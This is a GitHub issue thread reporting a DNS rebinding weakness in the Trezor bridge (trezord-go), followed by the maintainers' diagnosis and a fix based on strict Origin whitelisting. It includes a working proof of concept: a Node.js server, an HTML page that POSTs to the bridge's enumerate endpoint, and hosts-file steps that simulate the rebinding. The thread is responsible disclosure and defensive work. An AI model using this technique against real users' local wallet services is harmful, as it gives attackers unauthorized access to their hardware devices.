### ISSUE TITLE
DNS rebinding

### ISSUE THREAD

**Issue by mcudev** [trezor/trezord-go#16]
I was just playing around with this and found that it is weak to DNS rebinding attacks.

I was able to get access from a non-trezor domain with the latest version of Chrome (it's easier to demo DNS rebinding attacks with Chrome [Chrome must make another name lookup before connecting separately for the AJAX request]).

My simple POC setup consisted of a local web server bound to port 21325 on a non-loopback interface and the bridge bound to port 21325 on loopback (127.0.0.1). The web server could be any old server on the net. I did it this way to keep it all in one place.

Here's the simple node.js static content server that I used:

```
const express = require('express');
const app = express();
app.use(express.static('public'));
const http = require('http');
http.createServer(app).listen(21325, '192.168.1.10');
```

Here's the `index.html`:

```
<!doctype html>
<html>
<head>
  <script>
    function poc() {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http://nottrezor.io:21325/enumerate", true);
      xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          alert(this.responseText);
        }
      };
      xhr.send();
    }
  </script>
</head>
<body>
  <button id="clicker" onclick="poc()">Enumerate TREZOR devices</button>
</body>
</html>
```

To reproduce:
1. Run the bridge and the static content server bound to different interfaces.
2. Add to `/etc/hosts` (this simulates what an attacker would do with DNS):
`192.168.1.10 nottrezor.io`
3. Visit `http://nottrezor.io:21325/index.html` in Chrome
4. Change `/etc/hosts` line that you added before to (this simulates what an attacker would do with DNS):
`127.0.0.1 nottrezor.io`
5. Click button on the page over in the browser and get access to the connected devices in the context of the `nottrezor.io` domain.

**Comment by karel-3d** [comment]
Hm, the bridge checks the origin of the call, and it has to come from trezor.io or localhost.

https://github.com/trezor/trezord-go/blob/master/server/http.go#L93

I am wondering how can this attack work.

**Comment by jpochyla** [comment]
> Hm, the bridge checks the origin of the call, and it has to come from trezor.io or localhost.

Because it is a same-origin request.

**Comment by karel-3d** [comment]
Oh, OK.

Well when the attacker can serve files on the same PC, he can also read the devices locally directly, no?

I feel like I am missing something

**Comment by jpochyla** [comment]
Serving on localhost is a PoC, the point is that the second request goes to 127.0.0.1, but in a context of same origin, so outside of CORS policies. That's my understanding at least. The attack is similar to hijacking DNS of non-https site from the CORS whitelist.

**Comment by mcudev** [comment]
@jpochyla exactly

**Comment by karel-3d** [comment]
Oh. Well, one of the ways to fix it is not to allow same origin requests on the server? :) and allow only cross origin requests. Is that possible?

**Comment by karel-3d** [comment]
It should not be hard to filter out requests without origin headers through http handlers.

We never want to talk with trezord on the same origin.

**Comment by mcudev** [comment]
That might work. The request goes into the bridge with the header `Origin: http://nottrezor.io:21325`. Maybe drop requests that don't have a whitelisted Origin header value?

**Comment by mcudev** [comment]
I also had the feedback that you might want to add Cache-Control headers to specifically not cache or store responses in-case there is a browser bug. And also, the response being valid javascript (without the broken prefix stuff that is typical) might be a problem. It's been a while so I'm out of practice for how to make use of it like it is. But it feels like someone smartrer might be able to take advantage of it (even via POST request).

**Comment by jpochyla** [comment]
Sigh, now I see that gorilla/handlers toolkit simply passes through on invalid origin, instead of aborting:

https://github.com/gorilla/handlers/blob/master/cors.go#L50-L53

My fault.  I think using our own CORS middleware would be better, maybe similar to code in old trezord, but with restricted headers/methods:

https://github.com/trezor/trezord/blob/master/src/http_server.hpp#L132-L166

**Comment by mcudev** [comment]
Yeah I think you're ok whitelisting the Origin header and failing if it's not present, or not in the list. Modern browsers seem to support that well. Maybe you'll want to whitelist the FQDN too (with the trailing dot)? For example, `https://wallet.trezor.io./` doesn't work currently. Some people with "advanced" DNS search/domain/ndots config might benefit from using the FQDN hostname. That might be too low of a priority to worry about now though (I'm just trying to think of what could go wrong).

**Comment by karel-3d** [comment]
Should be fixed by https://github.com/trezor/trezord-go/pull/18

I took the gorilla CORS handler and simplified it, and it also always checks origin.

**Comment by mcudev** [comment]
That seems to fix it, thanks! I get `HTTP/1.1 403 Forbidden` now for this test.
